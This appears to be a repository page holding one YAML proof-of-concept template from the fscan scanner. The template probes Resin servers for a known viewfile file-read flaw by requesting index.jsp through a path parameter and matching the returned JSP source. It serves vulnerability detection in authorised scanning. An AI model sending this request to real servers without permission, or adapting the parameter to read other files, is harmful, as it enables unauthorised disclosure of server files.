qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/resin-viewfile-fileread.yml

12 lines
457 B
YAML
Raw Blame History

name: poc-yaml-resin-viewfile-fileread
rules:
- method: GET
path: /resin-doc/viewfile/?file=index.jsp
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"))
detail:
author: whynot(https://github.com/notwhy)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
- http://0day5.com/archives/1173/
Reference in New Issue View Git Blame Copy Permalink